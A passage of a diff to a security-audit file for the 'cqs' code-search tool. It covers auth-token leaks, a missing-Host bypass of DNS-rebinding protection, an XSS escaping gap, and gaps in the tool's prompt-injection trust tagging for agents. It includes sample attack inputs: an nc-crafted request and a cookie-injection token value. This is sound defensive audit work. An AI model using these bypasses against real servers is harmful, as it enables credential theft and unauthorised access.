-#### Auth token leaked into tracing spans by `TraceLayer::new_for_http()`
-- **Difficulty:** easy
-- **Location:** `src/serve/mod.rs:195` (`TraceLayer::new_for_http()`), interacts with `src/serve/auth.rs:194-232` (`enforce_auth`) and `src/cli/commands/serve.rs:73-76` (token-bearing URL passed to `xdg-open`)
-- **Description:** `auth.rs` is meticulous about not leaking the token: constant-time compare, `HttpOnly; SameSite=Strict` cookie, redirect that strips `?token=` from the address bar, and an explicit comment at `auth.rs:226-228` claiming "Tracing happens once per launch (banner) and never per-request — auditors can grep for the count of 401s without seeing tokens." That contract is silently broken by `TraceLayer::new_for_http()`, which is wired as the outermost layer (`mod.rs:195`) and thus runs **before** `enforce_auth`. The default `MakeSpan` of `tower-http` 0.6's TraceLayer records `http.uri` (full path + query string) on every request span. So the very first browser navigation `GET /?token=<43 chars>` lands the token in the span at DEBUG, and any operator running with `--log-level=debug`, `RUST_LOG=tower_http=debug`, or `RUST_LOG=info,tower_http=debug` (commonly recommended for diagnosing serve issues) writes the token to journald / log files / pipes that long-outlive the per-launch token. The same applies to `xdg-open`: the URL passed to `Command::new("xdg-open")` (`serve.rs:97`) typically ends up in shell history, in xdg-open's own logging, and in the browser's session-restore database — but those are user-local and arguably the intended cost of `--open`. The TraceLayer leak is the surprise: it converts a defensible "token visible to your local browser" model into "token visible to anyone who can read your logs." Coupled with the loud-warning banner that prints the token to stdout (`mod.rs:113-116`), captured stdout in CI / systemd `StandardOutput=` ends up in journald too. Severity: medium — token rotates per-launch, so leaked tokens are bounded by uptime, but a 30-day journal retention easily covers a long-running daemon.
-- **Suggested fix:** Customize TraceLayer's `MakeSpan` to scrub the query string before recording: `TraceLayer::new_for_http().make_span_with(|req: &Request<_>| { let path = req.uri().path(); tracing::info_span!("http_request", method = %req.method(), path) })`. Alternatively, redirect-then-trace by reordering the layers so the auth redirect runs before TraceLayer sees the URI — but that swaps the ordering invariant the comment relies on, and breaks the "401 responses still get traced" guarantee. The MakeSpan override is the surgical fix.
-
-#### `enforce_host_allowlist` lets a missing-`Host:` request bypass DNS-rebinding protection
-- **Difficulty:** easy
-- **Location:** `src/serve/mod.rs:234-251` (specifically the `None => Ok(next.run(req).await)` branch at line 240)
-- **Description:** The allowlist middleware passes through when `Host:` is absent: `match req.headers().get(header::HOST) { None => Ok(next.run(req).await), … }`. The doc-comment justification at `mod.rs:230-233` is "HTTP/1.1 requires one and hyper always provides one on real traffic, but unit tests built via `Request::builder()` without a `.uri()` that includes a host don't get one synthesized, and we'd rather not break that ergonomic." This privileges test ergonomics over runtime safety. (1) HTTP/1.0 does not require Host — a hand-crafted `GET /api/chunk/<id> HTTP/1.0\r\n\r\n` from `nc 127.0.0.1 8080` reaches the handler with zero Host header and zero allowlist check. With `--no-auth` the entire DNS-rebinding protection is bypassed for that request shape. With auth, the auth layer still gates it (so the immediate damage is bounded), but the v1 spec explicitly relies on the host allowlist as defense-in-depth, and this hole quietly disables it. (2) Browsers in error states (eg. `XMLHttpRequest` against a non-standard scheme handler) have historically dropped the Host header. (3) An axum middleware quirk: the middleware sees the raw header map; some HTTP libraries emit `Host:` with empty value (`Host: \r\n`), which `.to_str().unwrap_or("")` collapses to `""`, but `to_str()` on an empty `HeaderValue` actually returns `Ok("")`, which then fails the allowlist check (good). But a request with a non-ASCII byte in Host (`Host: \xff`) fails `.to_str()` → `unwrap_or("")` → empty → rejected. So the only real escape is the literal-missing case at line 240 — which is the most exploitable variant. The "don't break test ergonomics" excuse is also questionable: tests inside the crate can call `enforce_host_allowlist_with_default_allowed` or stamp a Host header in fixtures (`Request::builder().header(HOST, "127.0.0.1:8080").uri("/foo").body(...)`), which is a one-line change in the existing test file.
-- **Suggested fix:** Reject missing-Host as a malformed request: replace `None => Ok(next.run(req).await)` with `None => Err((StatusCode::BAD_REQUEST, "missing Host header"))`. Update tests in `src/serve/tests.rs` to set a Host header explicitly — those tests are already exercising the real auth + host paths; adding a header is consistent with what hyper does on real traffic and removes a real bypass.
-
-#### `--bind 0.0.0.0` allows LAN attackers to hit the server but the host-allowlist breaks the legitimate browser path — operator footgun pushes them to `--no-auth`
+#### SEC-V1.30.1-1: SECURITY.md falsely claims `cqs read --focus` and `cqs context` carry `trust_level` / `injection_flags`
 - **Difficulty:** medium
-- **Location:** `src/serve/mod.rs:207-218` (`allowed_host_set`), `src/cli/commands/serve.rs:27-37` (warning gating)
-- **Description:** With `cqs serve --bind 0.0.0.0`, the allowlist ends up containing `{localhost, localhost:8080, 127.0.0.1, 127.0.0.1:8080, [::1], [::1]:8080, 0.0.0.0:8080, 0.0.0.0}`. A LAN client navigating to `http://192.168.1.5:8080/` sends `Host: 192.168.1.5:8080`, which is NOT in the allowlist → 400 "disallowed Host header". So `--bind 0.0.0.0` is effectively unusable from any non-loopback peer despite the operator having explicitly opted into LAN binding. The expected operator response is to add `--no-auth` (which doesn't help — the host check is in front of auth) or to dig into the source and discover that `--bind <actual-IP>` is the real path. Worse: the only "bind-without-auth-is-loud" warning at `serve.rs:27-37` triggers only when `bind != "127.0.0.1" && bind != "localhost" && bind != "::1"`, but treats `0.0.0.0` as non-localhost-y and fires the warning — pushing operators toward `--no-auth` to "make it work." The result is a UX that punishes the secure path (auth on + bind 0.0.0.0 → 400) and rewards the insecure path (`--no-auth` → works for LAN). Threat model: an operator legitimately needs `cqs serve` reachable from a teammate's laptop on the same VLAN, sees auth-on returns 400 on the laptop, falls back to `--no-auth`, exposes the entire indexed corpus.
-- **Suggested fix:** When `bind == 0.0.0.0` (or `::`), the host allowlist should accept any RFC-1918 / loopback / link-local Host plus the bind port. Cleaner: when binding to a wildcard, populate the allowlist from `nix::ifaddrs` / `if_addrs` so the actual interface IPs are accepted. Even simpler: when `bind_addr.ip().is_unspecified()`, skip the host-header check entirely (auth is the only gate) and emit a one-line stderr warning at startup explaining that the host-header DNS-rebinding protection is disabled in wildcard mode.
+- **Location:** `SECURITY.md:14` (mitigation list) vs `src/cli/commands/io/read.rs:312-323` (`FocusedReadJsonOutput`) and `src/cli/commands/io/context.rs:269-325` (`full_to_json`, `compact_to_json`, `summary_to_json`)
+- **Description:** SECURITY.md "Indirect Prompt Injection" section asserts that *every* chunk-returning JSON output (`search`, `gather`, `task`, `scout`, `onboard`, **`read`**, **`read --focus`**, **`context`**, `similar`) carries `trust_level: "user-code" | "reference-code"` and a per-chunk `injection_flags: []` array. Verification:
+  - `FocusedReadJsonOutput` (read.rs:312) has fields `{focus, content, hints, warnings}`. No `trust_level`, no `injection_flags`.
+  - `full_to_json` / `compact_to_json` / `summary_to_json` build `FullChunkEntry` / similar from `data.chunks` and emit `{name, chunk_type, signature, line_start, line_end, doc, content}` — again no `trust_level`, no `injection_flags`.
+  - `cqs read` (non-focus) prints text-only via `cmd_read`; the JSON branch (`emit_json(&result)` in read.rs:369) emits the same structure with no trust tagging.
+  - The only sites that *do* tag are `display_unified_results_json` (search), `gather` (explicit ref-name threading), and the `tag_user_code_trust_level` walker used by `scout`/`onboard` (mod.rs:216) — and that walker only walks specific shapes (`entry_point`, `call_chain[]`, `callers[]`, `file_groups[].chunks[]`).
+- **Impact:** Per the team's "Docs Lying Is P1" rule, this is a correctness bug. Agents that filter on `trust_level` or `injection_flags` (per the public mitigation contract) will silently process `read --focus` / `context` payloads as untagged blobs and either misclassify them or reject them outright. Worse: the SECURITY.md narrative leads operators and downstream agent designers to *trust the contract* — but `read --focus` content can include reference-store dependencies surfaced through `get_types_used_by` + `search_by_names_batch`, so the lack of tagging matters semantically too.
+- **Suggested fix:** Either (a) extend `FocusedReadJsonOutput` and the context outputs to carry `trust_level` (always `"user-code"` for the project store path) plus an `injection_flags` array per emitted chunk-shaped sub-object, OR (b) remove `read`, `read --focus`, and `context` from the SECURITY.md mitigation list and explicitly document that those surfaces are exempt. Option (a) is the minimum-surprise fix and matches the rest of the contract.
 
-#### Token printed to stdout is captured by systemd `journald` — long-lived servers leak their token to a 30-day-retention log
+#### SEC-V1.30.1-2: SECURITY.md "Symlink Behavior" section directly contradicts the actual indexer (and SECURITY.md's own "Mitigations" line)
 - **Difficulty:** easy
-- **Location:** `src/serve/mod.rs:111-117` (`println!("cqs serve listening on http://{actual}/?token={}")`)
-- **Description:** The auth comment at `auth.rs:226-228` claims tokens never reach the structured log stream. The startup banner does write the token to stdout, intentionally, so a copy-paste from the operator's terminal lands in an authenticated session. But a long-running `cqs serve` deployed under systemd (`StandardOutput=journal`, the default) or via container (`docker run` capturing stdout into the container log driver) immediately persists the token banner into a log retention store the user never thinks about. The user's mental model is "the token only shows up in my terminal scrollback"; the reality is "anyone with `journalctl -u cqs-serve` (or the container log endpoint) can read the token until log rotation." Combined with that the token doesn't rotate during a long-lived launch, a 30-day-old banner is a 30-day-valid credential. Severity: low without a public binding (loopback only); medium with `--bind` to a LAN IP and any user on the box that has `journalctl -u`. Note: systemd `cqs-watch.service` already runs `cqs watch --serve`, not the HTTP server, but a future `cqs-serve.service` (or anyone wrapping `cqs serve` in systemd) inherits this trap silently.
-- **Suggested fix:** Two complementary mitigations: (1) print the token banner only to a controlling-tty-detected stderr (`atty::is(Stream::Stderr)`), or to a write-only file (`stdout` redirected to `/dev/null` when not interactive), so it doesn't leak to journald by default; (2) document in the listening banner that the token is per-launch and the user should rotate by restarting after disclosure. Optional: write the token to a `0o600`-permissioned file in `$XDG_RUNTIME_DIR` and print only the file path, with a `cqs serve token` subcommand that re-emits it on demand — same pattern Jupyter Lab uses since 2018.
+- **Location:** `SECURITY.md:203-215` ("Symlinks are followed, then the resolved path is validated"; allows `project/link → project/src/file.rs`) vs `src/lib.rs:601` (`enumerate_files` uses `WalkBuilder::follow_links(false)`) and `SECURITY.md:162` ("Symlink filtering: Symlinks are skipped during directory walks and archive extraction").
+- **Description:** The "Symlink Behavior" matrix promises that an in-tree symlink (`project/link → project/src/file.rs`) is allowed and an out-of-tree symlink (`project/link → /etc/passwd`) is blocked after canonicalization. Reality: `cqs::enumerate_files` — the only call path used by `cqs index`, `cqs ref add`, and the watch reconcile (`src/cli/watch/reconcile.rs:74`, `src/cli/watch/gc.rs:127,209`) — sets `follow_links(false)` and silently skips every symlink, regardless of target. Two lines above, SECURITY.md correctly states "Symlinks are skipped during directory walks." The two sections cannot both be true.
+- **Impact:** Operators who read the matrix expect indexable in-tree symlinks (e.g. monorepo workspaces that symlink common code) and will silently get a partial index — surprise stale results, no error message. Worse, the doc tells a contributor reading the threat model to test the wrong invariant ("symlinks resolved → validated" instead of "symlinks dropped"), which can mask a real regression that *does* start following links.
+- **Suggested fix:** Replace the "Symlink Behavior" matrix with the truth: directory-walk paths (`enumerate_files`, watch reconcile, `cqs convert`) drop symlinks entirely; only `cqs read <explicit-path>` and `cqs ref add` source-arg canonicalization follow symlinks (and reject targets outside the project root). The current matrix can be the example for the read/canonicalize path; the walk path needs its own row.
 
-#### Auth state ignored by `quiet=true` callers — internal API lets tests build a router that omits auth without auditing
+#### SEC-V1.30.1-3: `callgraph-3d.js` interpolates `e.message` into `innerHTML` without `escapeHtml` — SEC-2 fix gap
 - **Difficulty:** easy
-- **Location:** `src/serve/mod.rs:78-83` (`run_server` signature accepts `auth: Option<AuthToken>`), `src/serve/mod.rs:154-178` (`build_router`)
-- **Description:** `run_server` and `build_router` both take `auth: Option<AuthToken>`. Passing `None` silently disables auth — there is no `AuthRequired` enum, no `Either<NoAuth, Auth>` type. The callsite in `cmd_serve` (`serve.rs:61-65`) correctly defaults to `Some(random())` and only opts into `None` on `--no-auth`, but the type signature does not constrain future internal callers (e.g. an embedded `cqs serve` for a doctor-style smoke test, an alternate CLI surface, or a feature-gated dev mode) from passing `None` and quietly disabling auth. There is no compile-time gate or runtime warning when the auth-disabled path is taken; the only signal is the `eprintln!` at `mod.rs:120-123`, which is only emitted when `quiet == false`. So a future `run_server(store, addr, true, None)` ships a fully open server with zero output — a regression that nothing in the type system catches. The pattern matters because the equivalent invariant in `cqs ref add` is enforced via type and validate-by-construction, but here the "default secure" property lives only in convention.
-- **Suggested fix:** Replace `Option<AuthToken>` with a `enum AuthMode { Required(AuthToken), Disabled { ack: NoAuthAcknowledgement } }` where `NoAuthAcknowledgement` is a `pub` zero-sized type only constructable inside `cmd_serve` after the `--no-auth` flag is parsed. Future internal callers physically cannot instantiate the disabled variant without intentionally importing the proof type. Alternative: keep `Option<AuthToken>` but add a `tracing::error!` (not warn) in the `None` branch of `build_router` so any test or future caller that disables auth shows up loudly in logs.
+- **Location:** `src/serve/assets/views/callgraph-3d.js:55` (`container.innerHTML = ...3D bundle failed to load: ${e.message}...`) vs `src/serve/assets/views/cluster-3d.js:98` and `src/serve/assets/views/hierarchy-3d.js:75` (both use `${escapeHtml(e.message)}`).
+- **Description:** The SEC-2 hardening pass landed `escapeHtml` mirrors inside the cluster-3d and hierarchy-3d IIFEs (both files even carry an explicit comment: "Local XSS guard: this IIFE can't reach app.js's escapeHtml, so mirror it here for any server-derived string interpolated into innerHTML"). `callgraph-3d.js` has no `escapeHtml` mirror at all, and its bundle-load-failure handler interpolates `e.message` raw. While `e.message` is normally a static-ish JS error string, the bundle loader (`window.cqsEnsureThreeBundle`) can be made to throw a custom `Error` whose message embeds attacker-controlled response text — e.g. a fetch error against a CDN that the server doesn't control, or a future code path that surfaces server response bodies in the message.
+- **Impact:** Stored-XSS class regression on the server-side error path. Defence-in-depth value: SEC-2 already established the contract that every `${...}` going into `innerHTML` is escaped — this one site silently violates it, and a future cluster/hierarchy author copy-pasting from callgraph would propagate the gap.
+- **Suggested fix:** Mirror the `escapeHtml` helper at the top of `callgraph-3d.js` (matching cluster-3d.js:21 / hierarchy-3d.js:19) and wrap `e.message` at line 55. The parallel error path at lines 62-66 is a static template — fine as-is.
 
-#### `AuthToken::from_string` is `#[cfg(test)]` but exposed via `pub(crate)` — a future code path can construct a token with CR/LF and crash the server
+#### SEC-V1.30.1-4: `tag_user_code_trust_level` is shape-coupled — silently no-ops on unknown JSON shapes, leaving chunks untagged
+- **Difficulty:** medium
+- **Location:** `src/cli/commands/mod.rs:216-257`
+- **Description:** `tag_user_code_trust_level` is the implementation backing the SECURITY.md trust contract for scout/onboard/where/plan. It walks four hardcoded shapes:
+  1. `entry_point` (object)
+  2. `call_chain[]`
+  3. `callers[]`
+  4. `file_groups[].chunks[]`
+
+  Any chunk-shaped object outside those four containers (e.g. a future `dependents[]`, `examples[]`, `nested_callees[]`, or a top-level `chunks[]`) is silently emitted with **no `trust_level` field**. There is no schema check, no test that asserts every emitted chunk has `trust_level`, and no fallback "tag any object that has both `name` and `file`" walker.
+- **Impact:** The contract is "every chunk-returning JSON output carries `trust_level`," but the implementation is "every chunk in one of these four arrays carries `trust_level`." A contributor adding a new top-level field that holds chunks (very plausible — `onboard` is built specifically to grow new graph-shaped sections) will ship a fully-untagged chunk surface and the test suite won't catch it. Compounds with SEC-V1.30.1-1: scout/onboard's tagging coverage is more fragile than the docs claim.
+- **Suggested fix:** Replace the hand-rolled walker with a recursive visitor: for every JSON object encountered, if it carries the chunk-shape signature (e.g. `{name, file, line_start, ...}` and the chunk is from a project-store path), tag it. Alternatively, push the tagging into the result-builder layer (the structs that `serde::Serialize` into chunk JSON), so the field is structurally inseparable from the data. Add a test that dumps the emitted JSON for each scout/onboard sub-shape and asserts every chunk-shaped sub-object has `trust_level`.
+
+#### SEC-V1.30.1-5: Search results without `--include-refs` always emit `trust_level: "user-code"` — but the user's project store can itself include third-party content via `cqs notes mention` or vendored sources committed to the tree
 - **Difficulty:** hard
-- **Location:** `src/serve/auth.rs:75-78` (`from_string`), `src/serve/auth.rs:218-220` (`HeaderValue::from_str(&cookie).expect(…)`)
-- **Description:** `AuthToken::from_string` is gated on `#[cfg(test)]` so it's not callable from production code today. But the contract of `AuthToken` ("alphabet is URL-safe base64; HeaderValue construction infallible" — `auth.rs:215-218`) is enforced only by the docstring on `random()`, not by the type. If a future refactor lifts the cfg-gate (e.g. for a "fixed token from env var" feature, which is a reasonable ask for scripted automation that wants stable tokens across launches), an attacker who controls that env var can write `CR/LF` into the token and crash the worker on every redirect — `HeaderValue::from_str` rejects bytes that aren't valid HTTP header bytes, and the `.expect(…)` at line 218 panics. The crash is per-request (axum catches handler panics into a 500), so it's not a server-killer, but it's a guaranteed 500 for any request that hits the query-param redirect path. More subtly: a token containing `;` or `,` would split the cookie syntax and let an attacker who knows the format inject a second cookie pair, e.g. token = `validbase64; admin=true; ` — then on the redirect `Set-Cookie: cqs_token=validbase64; admin=true; ; Path=/; HttpOnly; SameSite=Strict`. The cookie would be malformed and most browsers would reject the whole header, but the principle of "only ever construct a HeaderValue from validated bytes" is broken.
-- **Suggested fix:** Make the alphabet a structural property of `AuthToken`: have `random()` return `AuthToken(String)` where the wrapped string is verified at construction time to be `[A-Za-z0-9_-]+` and panic on construction (not on use) if it's not. For `from_string`, do the same validation; tests that want to build a deterministic token still get one, but they cannot smuggle invalid bytes in. With the alphabet enforced at the type level, the `.expect(…)` at `auth.rs:218` becomes a real safety proof rather than a fragile docstring.
+- **Location:** `src/store/helpers/types.rs:172-196` (`to_json_with_origin`) + `src/cli/commands/search/query.rs:497-519`
+- **Description:** When `--include-refs` is not set (the default), `query.rs` short-circuits to `display_unified_results_json` which calls `r.to_json()` (helpers/types.rs:161) → `to_json_with_origin(None)` → unconditional `"trust_level": "user-code"`. The "user-code" claim is structural: it tracks "did this come from a `cqs ref` reference index", not "is this code authored by the project owner." Vendored/copied third-party code committed into the project tree, or content surfaced by `cqs notes` from `docs/notes.toml` (which can ship in a cloned repo per SECURITY.md's own "shared notes" surface), all emit as `user-code` despite being exactly the indirect-prompt-injection surface the trust-level field exists to flag.
+- **Impact:** Agents that adopt the documented posture ("treat `reference-code` as untrusted, `user-code` as more trusted") get a false sense of security on the most common attack surface — committed third-party content in the project tree. SECURITY.md explicitly calls out vendored upstream content as a payload vector ("committed by a contributor or embedded by an upstream dependency") but the trust-level signal cannot distinguish vendored from authored code; both are "user-code." The first-encounter shared-notes gate (#1168) partially mitigates the notes path but does not change the emitted `trust_level` after acceptance.
+- **Suggested fix:** Two options: (a) Document the limit explicitly in SECURITY.md — `trust_level: "user-code"` means "from the user's project store," not "authored by the user" — and add a note that vendored/upstream content inside the project tree retains `user-code`. (b) Add a path-prefix denylist (e.g. `vendor/`, `third_party/`, `node_modules/`) at index time, persist a per-chunk `vendored: bool`, and have `to_json_with_origin` downgrade to `"third-party-code"` for vendored chunks. Option (a) is the cheap fix; option (b) is the proper one.
 
-#### `cqs serve` request body is unbounded — POST or chunked uploads can exhaust memory; no `RequestBodyLimitLayer`
+#### SEC-V1.30.1-6: `cqs ref add` accepts a local source path with no symlink-target audit — references can index outside their declared source root via in-tree symlinks
+- **Difficulty:** medium
+- **Location:** `src/cli/commands/infra/reference.rs:130-150`
+- **Description:** `cmd_ref_add` canonicalizes the `--source` path (`dunce::canonicalize(source)`) but then hands the *canonicalized* root to `enumerate_files(&source, ...)`. The walk uses `follow_links(false)` so symlinks at the *root* are followed only to the extent that `dunce::canonicalize` resolved them — which is fine — but the indexed corpus is whatever lives at the resolved root. There is no audit comparing "the source path the user typed" against "the canonical root that gets indexed." A user who runs `cqs ref add foo /home/me/projects/foo` against a path that is itself a symlink to `/some/other/dir/that/contains/proprietary-code/` will silently get an index of the *other* dir. Nothing flags the redirection. The reference path is then persisted into `.cqs.toml` as `source = <canonical-resolved-path>`, so a follow-up `cqs ref list` shows the resolved path — but if the user's mental model is "I added /home/me/projects/foo," the reindex behavior is surprising.
+- **Impact:** Low-severity but worth a note. The bigger issue is operators who symlink `vendored-monorepo-pull/` → `~/work/customer-A-private/` to "test cqs ref" and silently end up with a customer-content reference index. Also relevant if `cqs ref add` is used inside CI/automation that takes a `--source` from a config file controlled by a less-trusted contributor.
+- **Suggested fix:** Compare `source` (user input, after `Path::new`) to `dunce::canonicalize(source)`; if they differ, log a `tracing::warn!` (and emit a JSON `warnings` field on `cmd_ref_add`'s return) telling the user the symlink was resolved before indexing. Alternative: refuse to index symlinked roots without a `--allow-symlink-source` opt-in.
+
+#### SEC-V1.30.1-7: `LocalProvider` follows up to 2 redirects on `Authorization`-bearing requests — bearer token can leak across origins on misconfigured local LLM endpoints
+- **Difficulty:** medium
+- **Location:** `src/llm/local.rs:124-129` (`Policy::limited(2)`) + `src/llm/local.rs:435-437` (`Authorization: Bearer <key>` header)
+- **Description:** P2.36 aligned the production redirect policy with the doctor probe (`Policy::limited(2)`). The change rationale comment claims "Same-origin HTTP→HTTPS redirects on bind-localhost are benign" — but `Policy::limited(2)` does *not* restrict to same-origin. A misconfigured `CQS_LLM_API_BASE` (e.g. a load-balancer that 302s from `http://internal-llm/` → `http://attacker-controlled-origin/v1/chat/completions`) will see the request follow the redirect, and `reqwest`'s default behavior of stripping `Authorization` *only on cross-origin redirects* assumes you're on the latest reqwest with the strip-on-redirect default. cqs's reqwest version pin and policy interaction should be verified. (cqs uses reqwest 0.12.x, which does strip `Authorization` cross-origin by default — but the strip is silent and operators may not notice the bearer was stripped, leading to an infinite-401 loop instead of a clean fail-fast.)
+- **Impact:** If reqwest's strip-on-redirect remains default-on, this is observability-grade: silent 401 instead of a clear "redirect to other origin, bearer stripped" warning. If a future reqwest bump opts back into propagating the header, this becomes a credential-leak path. Either way, the assumption "same-origin only" baked into the comment is wrong — the policy doesn't enforce it.
+- **Suggested fix:** Pin behavior with a custom `redirect::Policy::custom` closure that explicitly checks `previous.last().origin() == new.url().origin()` and otherwise rejects. Logs a `tracing::warn!` on cross-origin attempts so operators see misconfigured endpoints. The doctor probe should match.
+
+#### SEC-V1.30.1-8: Daemon env snapshot logs every `CQS_*` variable at info — `CQS_LLM_API_KEY` lands in the journal
 - **Difficulty:** easy
-- **Location:** `src/serve/mod.rs:154-196` (`build_router` — no body-limit layer in the chain)
-- **Description:** The router declares only `GET` routes (`routes.rs:160-168`), and axum returns 405 for non-GET on those routes. But axum still BUFFERS the request body before dispatching — and for a route declared as `get(...)`, axum 0.7 reads the body into memory before deciding to 405. There's no `tower_http::limit::RequestBodyLimitLayer` in the chain. So an attacker (after passing host + auth) can `POST /api/stats` with `Content-Length: 99999999999` and `Transfer-Encoding: chunked`, and axum will buffer up to the OS-level read limit before responding 405. With the auth layer running *outside* the body read, the 405 path can be reached by any authenticated client. Memory pressure proportional to body size, repeated forever. Since auth is in front, an external attacker without a token can't do this — but a multi-user box where one user has the token (per the `journald` finding above) can. Also: for the GET-only routes that DO expect query strings (e.g. `/api/search?q=…`), there is no `Content-Length` cap on the body that some clients might send anyway. axum forgivingly ignores the body for GET, but not before reading it into memory.
-- **Suggested fix:** Add `RequestBodyLimitLayer::new(64 * 1024)` to the layer chain (sits inside CompressionLayer, outside auth so the limit applies to even rejected requests). 64 KiB is plenty for query strings and cookies; legitimate clients never approach it. Tower-http already has the layer; no new dep.
+- **Location:** `src/cli/watch/mod.rs:529-532`
+- **Description:** On daemon startup, the code iterates *every* env var starting with `CQS_` and logs them via `tracing::info!(cqs_vars = ?cqs_vars, "Daemon env snapshot")`. The list is not redacted. `CQS_LLM_API_KEY` (read in `src/llm/local.rs:110`) is one of the env knobs that flows through this snapshot if set. Other secret-bearing vars include any future `CQS_*_API_KEY`, `CQS_*_TOKEN`, `CQS_*_PASSWORD`. With OB-V1.30-1 fixing the default subscriber to surface info-level events to the journal, every daemon start now writes the API key into systemd-journald's 30-day retention.
+- **Impact:** Same class as P1.13 (auth token printed to stdout, captured by journald): a secret meant for in-memory use becomes a 30-day journal artifact. This one is worse because it lands automatically every daemon restart, not just on first launch.
+- **Suggested fix:** Maintain a `SECRET_PREFIXES` list (`API_KEY`, `TOKEN`, `PASSWORD`, `SECRET`) and substitute logged values with a `<redacted len=N>` placeholder. Better: switch the snapshot to log *names only* (the keyset is the operationally interesting part — values are visible via `systemctl show-environment`).
 
-#### `Path=/` cookie scope plus 127.0.0.1 sharing — multiple `cqs serve` instances on the same host share cookies and can hijack each other
-- **Difficulty:** hard
-- **Location:** `src/serve/auth.rs:211-214` (`Set-Cookie: cqs_token={token}; Path=/; HttpOnly; SameSite=Strict`)
-- **Description:** Two `cqs serve` instances on the same machine, on different ports (e.g. project A on 8080, project B on 8081), both share the same cookie origin from the browser's perspective: cookies on `localhost`/`127.0.0.1` are scoped by host but NOT by port. Both servers set `cqs_token=...` with `Path=/`. A user authenticates to project A, gets cookie `cqs_token=A_TOKEN`. They later visit `http://127.0.0.1:8081/?token=B_TOKEN` for project B. The redirect sets `cqs_token=B_TOKEN`, OVERWRITING the project A cookie in the browser jar (same name + host + path). Now the user's tab on project A is silently logged out and (worse) any link they click through to project A sends `cqs_token=B_TOKEN`, which fails ct_eq and 401s. Browsers do scope cookies by `Path=/` but not by port, so this is a fundamental browser-cookie limitation, not a server bug. It's still a real footgun for any user running two `cqs serve` instances, plus a downgrade vector: an attacker who can make the user visit their own attacker-controlled `cqs serve` on a port they control — say, by phishing the user into running `cqs serve --bind 127.0.0.1 --port 8081` against a malicious project — replaces the legitimate project's cookie. Combined with SameSite=Strict-bypass via top-level navigation (the user *is* navigating top-level), the attacker can drop any cookie they like into the victim's localhost cookie jar. Mitigation note: the comment at `auth.rs:42-47` ("Pinned to `cqs_token` so a future second-server instance running in another tab on the same host uses a different cookie path") explicitly acknowledges the issue but does not actually solve it.
-- **Suggested fix:** Use `__Host-` cookie prefix (`__Host-cqs_token`) per RFC 6265bis — requires `Path=/`, `Secure`, and forbids `Domain`. The `Secure` requirement means the cookie won't stick on plain HTTP, which is a problem for localhost. Alternative: include the bind port in the cookie name (`cqs_token_8080`) so two instances don't collide. Best alternative: set `Path=/api/__cqs_<port>/` and have the auth layer rewrite the request path — heavy. Pragmatic: set the cookie name from a hash of `(bind_addr, launch_time)` so two instances don't collide and a new launch invalidates the old cookie automatically. The knob count rises but the multi-instance footgun goes away.
+#### SEC-V1.30.1-9: `cqs ref add` storage dir created with `0o700` but the parent (`~/.local/share/cqs/refs/`) inherits umask — sibling references can be world-readable on permissive umask
+- **Difficulty:** easy
+- **Location:** `src/cli/commands/infra/reference.rs:137-145`
+- **Description:** The code does `std::fs::create_dir_all(&ref_dir)` and then `set_permissions(&ref_dir, 0o700)`. `create_dir_all` creates *every* missing component, but only the final component gets chmod-ed to `0o700` afterward. The parent (`~/.local/share/cqs/refs/`) is created with default umask (`0o755` on most systems). On a multi-user box, a sibling user can `ls ~user1/.local/share/cqs/refs/` and enumerate every reference name, and — if the original creating umask was `0o022` and a future ref's directory is created without the explicit chmod (or before it lands) — read the index DB. The `0o700` on the final directory is correct; the gap is the parent.
+- **Impact:** Reference-name leakage at minimum (an attacker on the same box knows you've indexed `customer-secret-codebase`). The rapidsai/private-repos issue from SECURITY.md becomes worse: a multi-user developer box leaks the *list* of customer code that's been referenced even if the indexes themselves stay private.
+- **Suggested fix:** Walk every parent component the call may have created and chmod each to `0o700` (or, for `~/.local/share/cqs/`, `0o755` is fine — but `~/.local/share/cqs/refs/` should be `0o700`). Alternatively, set the process umask to `0o077` for the duration of the create_dir_all call, then restore (mirroring the SEC-D.6 socket pattern at watch/mod.rs:496).
 
-## One-line summary
+#### SEC-V1.30.1-10: `cqs ref add` does not set `0o600` on the index DB after writing — falls back to umask-default permissions
+- **Difficulty:** easy
+- **Location:** `src/cli/commands/infra/reference.rs:165-178` (Store::open + run_index_pipeline)
+- **Description:** After `cmd_ref_add` chmods the *containing directory* to `0o700`, it opens a SQLite store at `db_path` (`ref_dir.join(INDEX_DB_FILENAME)`) via `Store::open`. SQLite creates the file at default umask (`0o644` on most systems). The directory is `0o700` so a sibling user can't enter it — but if the user later changes the directory permissions (e.g. for a backup tool) or if the ref dir is on a network filesystem that ignores Unix permissions, the file itself is world-readable. There's no explicit `set_permissions(0o600)` on the DB after creation. Compare `model_fingerprint`/`model.toml` at SEC-19 (export-model) which *does* set `0o600`.
+- **Impact:** Defence-in-depth gap. The directory chmod is the primary defence; this is the secondary layer that's missing. On NFS / SMB / overlay filesystems where directory perms are advisory and file perms are authoritative, the gap matters. On a normal local ext4 filesystem with `0o700` parent, exposure is minimal.
+- **Suggested fix:** After `Store::open(...)` succeeds in `cmd_ref_add`, walk every file in `ref_dir` and chmod to `0o600`. Match the pattern used in `cqs export-model` for `model.toml`.
+# Audit Findings — Data Safety (v1.30.1, 2026-04-28)
 
-Eight new findings on top of SEC-1 … SEC-8 (already triaged). All are in the v1.30.0 auth surface (#1118): TraceLayer leaks the token via URI logging despite the careful HttpOnly/redirect handoff; missing-Host requests bypass DNS-rebinding protection; `--bind 0.0.0.0` is broken in a way that pushes operators to `--no-auth`; the launch banner persists tokens to journald for log-retention lifetime; `Option<AuthToken>` permits silently building a no-auth router; `from_string` is cfg-gated but the alphabet invariant relies on a docstring rather than a type; no request-body-limit layer; cookies aren't port-scoped on localhost so two instances stomp each other.
+Audit mode: ON. Scope: data corruption, validation, schema migrations, races, deadlocks, thread safety, transaction integrity, atomic-write patterns, fsync placement, lock ordering. Triage state: cross-checked against `docs/audit-triage-v1.30.0.md` (DS-V1.30 series — migration backups, fsync placement, slot TOCTOU — all fixed or filed). v1.30.1 introduces `#1182` watch reconcile + `WatchSnapshot` surface; this audit focuses on those new code paths plus what was deferred.
 
+---
 
 ## Data Safety
 
-#### Migration restore_from_backup overwrites live DB while pool holds open connections
+#### `cqs index --force` reopen leaves stale `pending_rebuild` against orphaned store handle
 - **Difficulty:** medium
-- **Location:** `src/store/backup.rs:171-180` (called from `src/store/migrations.rs:106-128`)
